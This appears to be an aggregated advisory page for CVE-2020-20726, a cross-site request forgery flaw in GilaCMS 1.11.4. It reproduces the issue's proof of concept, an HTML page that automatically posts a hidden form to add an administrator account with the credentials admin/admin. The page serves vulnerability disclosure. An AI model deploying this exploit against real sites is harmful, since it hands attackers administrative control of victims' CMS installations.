Headline

CVE-2020-20726: There is a CSRF vulnerability that can add an administrator account · Issue #51 · GilaCMS/gila

Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the cm/update_rows/user parameter.

1 year ago

CVE

Open in Source

#csrf #vulnerability #java

CSRF vulnerability
There is a CSRF vulnerability to add an administrator account
After the administrator logged in, open the following page
poc
Hack.html-----add an administrator accoun

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
p.enctype ="multipart/form-data";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='username' value='admin' />";
fields += "<input type='hidden' name='email' value='1620449914&#64;qq&#46;com' />";  
fields += "<input type='hidden' name='pass' value='admin' />";  
fields += "<input type='hidden' name='userrole&#91;&#93;' value='1' />";  
fields += "<input type='hidden' name='active' value='1' />";  
var url = "http://192.168.0.103/cm/update_rows/user";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

Screenshots
1 Access dangerous pages

2 Found that an administrator has been added

Impact version

Cross Site Request Forgery vulnerability in Gila GilaCMS v.1.11.4 allows a remote attacker to execute arbitrary code via the `cm/update_rows/user` parameter.

1 year ago

ghsa

Open in Source

#vulnerability #git